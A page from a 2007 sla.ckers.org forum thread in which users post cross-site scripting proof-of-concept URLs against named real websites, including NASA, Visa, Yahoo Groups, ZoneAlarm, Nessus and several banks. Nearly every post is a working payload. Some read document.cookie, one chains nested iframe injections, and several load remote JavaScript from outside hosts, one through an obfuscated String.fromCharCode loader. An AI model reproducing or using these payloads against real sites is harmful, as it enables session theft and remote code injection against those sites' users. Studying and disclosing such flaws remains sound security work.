Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...4142434445464748495051...LastNext
Current Page: 46 of 65
Re: So it begins
Posted by: blad3
Date: May 02, 2007 06:44AM

Yes, like I said. I didn't found anything.
But people never cease to amaze me:)

Actually if you look into HTML source http://www.thelookandsoundofperfect.com/ there is

var MMredirectURL = window.location;

and

+ '<param name="movie" value="flashplayer_install.swf?MMredirectURL='+MMredirectURL+'&MMplayerType=ActiveX&MMdoctitle='+MMdoctitle+'" />'
document.write(productInstallOETags); // embed the Flash Product Installation SWF

But this code is executed only if Flash is not installed.

Options: ReplyQuote
Re: So it begins
Posted by: trev
Date: May 02, 2007 10:52AM

I didn't look at thelookandsoundofperfect.com until now. Here you have it:

http://www.thelookandsoundofperfect.com/popCover.php?img=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E%3Cdiv%20dummy=%22

Here is how you can load any Flash movie into their content pane (maybe I should call this "Flash Injection" :)

[www.thelookandsoundofperfect.com]

Now you only need to find a redirect on their site to inject a video from a third-party site. And here are some scripts you might want to play around with (don't seem vulnerable however):

http://www.thelookandsoundofperfect.com/_dev/_lib/process_stf.php?yname=me&yemail=me@example.com&fname=him&femail=him@example.com
http://www.thelookandsoundofperfect.com/_dev/_lib/process_signup.php?email=me@example.com

Also, XSS in a page they are linking to:

http://www.soundandvisionmag.com/article.asp?section_id=60&article_id=2207&page_number=1asdf%22%2Balert('xss')%2B%22



Edited 2 time(s). Last edit at 05/02/2007 11:36AM by trev.

Options: ReplyQuote
Re: So it begins
Posted by: blad3
Date: May 02, 2007 12:49PM

Thanks trev,
Nice findings :)

Options: ReplyQuote
Re: So it begins
Posted by: trev
Date: May 02, 2007 06:42PM

In IE: [horo.mail.ru]
In Firefox: [horo.mail.ru]

Options: ReplyQuote
Re: So it begins
Posted by: fyoung
Date: May 02, 2007 07:41PM

http://www.gnc.com/search/noResults.jsp?kw=<iframe%20src=http://google.com



Edited 1 time(s). Last edit at 05/02/2007 08:59PM by fyoung.

Options: ReplyQuote
Re: So it begins
Date: May 05, 2007 12:13AM

http://www.marketingcrossing.com/lcvisitorjssearchresults.php?clsjobalert_searchsource=2&clsjobalert_hdnsubmited=1&clsjobalert_paraarray_jobtype=-1&clsjobalert_array_jobregion=-1&clsjobalert_paraarray_firmtype=-1&clsjobalert_keywords=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

In response to this: http://sla.ckers.org/forum/read.php?17,11152 =oD

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: May 06, 2007 02:59PM

http://www.iqfieber.de/anmelden.php?w=a%22%3E%3Cscript%3Ealert(42)%3C/script%3E
http://www.lebenstest.de/index.php?ac=ANMELDEN&w=a%22%3E%3Cscript%3Ealert(42)%3C/script%3E

same with nested injection (more than 10 alerts!)

http://www.lebenstest.de/index.php?email=e%22%3E%3Ciframe+src%3D%2Findex.php%3Fac%3DANMELDEN%26w%3Da%2522%253E%253Cscript%253Ealert%2842%29%253C/script%253E%25%3C%2522%20x&firstname=v%22%3E%3Ciframe+src%3D%2Findex.php%3Fac%3DANMELDEN%26w%3Da%2522%253E%253Cscript%253Ealert%2842%29%253C/script%253E%25%3C%2522%20x&lastname=n%22%3E%3Ciframe+src%3D%2Findex.php%3Fac%3DANMELDEN%26w%3Da%2522%253E%253Cscript%253Ealert%2842%29%253C/script%253E%25%3C%2522%20x&street=s%22%3E%3Ciframe+src%3D%2Findex.php%3Fac%3DANMELDEN%26w%3Da%2522%253E%253Cscript%253Ealert%2842%29%253C/script%253E%25%3C%2522%20x&hnr=&zipcode=p%22%3E%3Ciframe+src%3D%2Findex.php%3Fac%3DANMELDEN%26w%3Da%2522%253E%253Cscript%253Ealert%2842%29%253C/script%253E%25%3C%2522%20x&city=o%22%3E%3Ciframe+src%3D%2Findex.php%3Fac%3DANMELDEN%26w%3Da%2522%253E%253Cscript%253Ealert%2842%29%253C/script%253E%25%3C%2522%20x&country=-1&Date_Day=&Date_Month=0&Date_Year=&w=&agbcheck=1&ac=register&Submit=1&x=263&y=14

contains multiple iframes, someone out there to improve to show them all? Don't hesitate to start million of tests with foobar-data, it's a junk site anyway ;-)

Options: ReplyQuote
Re: So it begins
Posted by: backbone
Date: May 08, 2007 03:58AM

a XSS on miniclip.com

http://www.miniclip.com/games/en/gun-run/?query=<script>alert(navigator.appName)</script>

not necesarely gun run but that was a game that I was looking for before I discovered it...

Options: ReplyQuote
Re: So it begins
Posted by: FR3DC3RV
Date: May 08, 2007 02:37PM

http://www.lrb.co.uk/search/index.php?contributor="><script>alert(document.cookie)</script>
http://lc.sduhsd.net/redir.php?url=http://<script>alert(document.cookie)</script>
http://www.redir.cz/static/redir_404.php?redirURL=f<script>alert(document.cookie)</script>
http://keetweej.vanheusden.com/redir.php?id=<script>alert(document.cookie)</script>
http://www.nhlbi.nih.gov/cgi-bin/redir.pl?url=http:/<script>alert(document.cookie)</script>
http://www.ntis.gov/search/results.asp?loc=3-0-0&SimpleSearch=yes&AVSearch=false&frm_qry_Search="><script>alert(document.cookie)</script>
http://www.statenews.com/do_search.phtml?keywords=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

-------------------------------
http://fr3dc3rv.blogspot.com



Edited 1 time(s). Last edit at 05/08/2007 02:38PM by FR3DC3RV.

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: May 08, 2007 04:44PM

ouch!

https://plugins-customers.nessus.org/support-center/index.php?form_submit=forgot_email&mod_id=6&forgot_email=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fh4k.in%2Fi.js%3E%3C%2Fscript%3E

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: May 08, 2007 04:50PM

ouch!²

https://www.zonealarm.com/store/application;jsessionid=GAwSf4C5dJtd3A5PIG4e7TNkOv0tIU9JP0UHFsT9JD7HKigvl1Q2!-1992105728!-1062696903!7551!7552!NONE?namespace=zls_user&origin=glo%22%3E%3Cscript%3Eeval(String.fromCharCode(97,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,97,46,115,114,99,61,39,104,116,116,112,58,47,47,104,52,107,46,105,110,47,105,46,106,115,39,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,97,41,59))%3C/script%3Ebal.jsp&event=link.login&dc=34std&ctry=DE&lang=de

Options: ReplyQuote
Re: So it begins
Posted by: beford
Date: May 10, 2007 12:16AM

http://groups.yahoo.com/convacct?email=owned%40gmail.com&list=tux%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E



Edited 2 time(s). Last edit at 05/10/2007 01:14AM by beford.

Options: ReplyQuote
Re: So it begins
Date: May 10, 2007 02:56PM

http://www.java4less.com/RDataMatrix-php/demo.php?Submit=Press+to+apply+changes&CODE=%3C%2Ftextarea%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%0D%0A&ENCODING=AUTO&FORMAT=&TILDE=N&MODULE_SIZE=4&QUITE_ZONE=10&BACK_COLOR=YELLOW&BAR_COLOR=BLACK&ROTATE=0&IMG_TYPE=PNG

demo pages are bad =o(

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: May 11, 2007 01:46AM

http://www.search.com/search?q=%27%27%60%60%22%22%3E%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cp+id%3D%22&q.lit=%27%27%60%60%22%22%3E%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cp+id%3D%22&q.or=%27%27%60%60%22%22%3E%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cp+id%3D%22&q.not=%27%27%60%60%22%22%3E%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cp+id%3D%22&q.lang=&q.ft=&q.age=&q.site=%27%27%60%60%22%22%3E%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cp+id%3D%22&q.link=%27%27%60%60%22%22%3E%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cp+id%3D%22&q.related=%27%27%60%60%22%22%3E%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cp+id%3D%22&submit=%27%27%60%60%22%22%3E%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cp+id%3D%22&adv=%27%27%60%60%22%22%3E%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cp+id%3D%22

http://my.cnet.com/5303-4_92-0-2.html?tag=tab&ursRegID=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 05/11/2007 10:00AM by tx.

Options: ReplyQuote
Re: So it begins
Posted by: nemessis
Date: May 11, 2007 05:47PM

Counter-Strike AmxMod - WebMod XSS

'http://games7.evolva.ro:27015/auth.w?redir="><script>alert(1337)</script>



Edited 1 time(s). Last edit at 05/11/2007 05:51PM by nemessis.

Options: ReplyQuote
Re: So it begins
Posted by: thornmaker
Date: May 11, 2007 11:46PM

http://mynasa.nasa.gov/portal/bookmarks/BookmarkServlet?bookmark_title=NASA+Missions+Event+Archive&bookmark_url=javascript:alert(/ET%20phone%20home./);&bookmark_label=HERE%20BE%20DRAGONS<script>alert(/ET%20was%20here/)</script>

then go to http://mynasa.nasa.gov/portal/site/mynasa/index.jsp?image_pattern=02000 to fire

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: May 12, 2007 03:26PM

http://www.volvoautobank.de/cgi-bin/lk?hcurr=$%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&mvar=0&sversion=%5Bsversion%5D&ecode=%5Becode%5D&gcode=%5Bgcode%5D&svcode=%5Bsvcode%5D&tprice=%5Btprice%5D&preselect=4%7C0%7C0%7C4%7C0%7C0%7C7190%7Cp&hpg=p&target=pmt&skin=3&rpg=on&mod=5&fz=S80+2.5T&a=Kinetic&gp=37250%2C00+EUR&sa=0%2C00+EUR&ges=37250%2C00+EUR&iaa=71%22%3E%3Cu%3E9990%2C00+EUR&iar=19%2C30+%25&lz=36+Monate&ll=10.000+km
www.porschebank.at http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.porschebank.at/schadenmeldung.php&vertrag_nr=%22%3E%3Cscript%3Ealert(42)%3C/script%3E
http://www.porschebank.com/seite.php?s=22&b=xss%22'%3E%3Cscript%3Ealert(42)%3C/script%3E2&lang=de
http://www.nissanbank.de/nisbank.php?PHPSESSID=42%22%3E%3Cscript%3Ealert(42);%3C/script%3E
http://dcc1.daimlerchrysler-bank-aktionen.de/?c=3%22%3E%3Cframe%20src=javascript:alert(42);%20
https://www.gmac-fintoolscompact.com/au/contact/index.asp?toolname=contact&viewingCountry=us'%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&cntry_cd=au&lang_cd=en&target=Windows-x86&inframe=true



Edited 1 time(s). Last edit at 05/17/2007 01:53PM by kirke.

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: May 13, 2007 05:09PM

For my friends at the AACS: http://www.hddvd.org/search/search-result.php?searchwords=%22%3E%3Cscript%3Ealert%28%27Oops%21+09f911029d74e35bd84156c5635688c0.%27%29%3B%3C%2Fscript%3E%3C%22&x=0&y=0

Options: ReplyQuote
Re: So it begins
Posted by: nemessis
Date: May 13, 2007 05:23PM

.http://visasearch.visa.com/UsaSearch/query.html?qt=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&col=usa&qs=&ws=0&st=1&style=usa&x=11&y=7



Edited 1 time(s). Last edit at 05/13/2007 05:26PM by nemessis.

Options: ReplyQuote
Re: So it begins
Posted by: nemessis
Date: May 13, 2007 05:48PM

:)https://shopping.ccbill.com/search.cgi?search=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&adult=0&generalSearch=%A0%A0%A0SEARCH%A0%A0%A0

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: May 14, 2007 08:45PM

More nexopia.
Don't need to be logged in for these ones.

http://plus.www.nexopia.com/profile.php?requestType=query&requestParams%5BageRangeMin%5D='%3E%3Cscript%3Ealert(1)%3C/script%3E&requestParams%5BageRangeMax%5D='%3E%3Cscript%3Ealert(2)%3C/script%3E

Link fixed, but the hole is too.

- Kyran



Edited 1 time(s). Last edit at 05/15/2007 08:54PM by Kyran.

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: May 15, 2007 04:48PM

I'd just like to point out to the people finding all these XSS flaws that a new version of the XSS assistant is out, click here for more info: http://sla.ckers.org/forum/read.php?12,1919,11579,page=2#msg-11579

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins
Posted by: nemessis
Date: May 15, 2007 06:38PM

Imlive.com :)

http://imlive.com/warning.asp?wargotopage="><script>alert('Nemessis')</script>&cat=1&roomid=10

Options: ReplyQuote
Re: So it begins
Posted by: nemessis
Date: May 15, 2007 07:02PM

enjoy.be

http://cams.enjoy.be/front_common/detail.php?account=c6349&ref=0016&mref=0016&language=NL&front=front_v5&previewdir="><script>alert(1337)</script>

Options: ReplyQuote
Re: So it begins
Posted by: nemessis
Date: May 15, 2007 07:08PM

Flirt4free.com

http://www.flirt4free.com/login/?model_id=18301&service=girls&mp_code=0000&source_code="><script>alert('Nemessis-www.rstzone.net')</script>&PHPSESSID=b9d7fa98aaeb41f6c5c2f04f158fbdce

Options: ReplyQuote
Re: So it begins
Posted by: nemessis
Date: May 15, 2007 07:22PM

Seventeenlive.com

http://www.seventeenlive.com/login/login.php?link=&username=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&password=sddddddddd&access_key=&submit=Login

Options: ReplyQuote
Re: So it begins
Posted by: nemessis
Date: May 15, 2007 07:30PM

http://mail.k.ro/sm-bin/forgot_password?username=%22%3E%3Cscript%3Ealert%28%27Nemessis-www.rstzone.net%27%29%3C%2Fscript%3E

Options: ReplyQuote
Re: So it begins
Posted by: nemessis
Date: May 15, 2007 08:17PM

https://www.epassporte.com/secure/forgot.cgi?uid=%22%3E%3Cscript%3Ealert%28%27Nemessis-www.rstzone.net%27%29%3C%2Fscript%3E&f_update_login.x=48&f_update_login.y=18&answer=

Options: ReplyQuote
Re: So it begins
Posted by: thornmaker
Date: May 15, 2007 11:29PM

i know i shouldn't go pokin' around at the good publishers site... but the irony factor was just too much... http://www.syngress.com/catalog/lq_l.cfm?error=email&pid=4360&name=%22%3E%3Cscript%3Ealert(0)%3C/script%3E<div%20name=%22&email=&company=&companyURL=&phone=&comments=

Options: ReplyQuote
Re: So it begins
Posted by: nemessis
Date: May 16, 2007 06:12PM

www.undernet.org

http://www.undernet.org/news/index.php?page=2&session="><script>alert(1337)</script>

Options: ReplyQuote
Pages: PreviousFirst...4142434445464748495051...LastNext
Current Page: 46 of 65


Sorry, only registered users may post in this forum.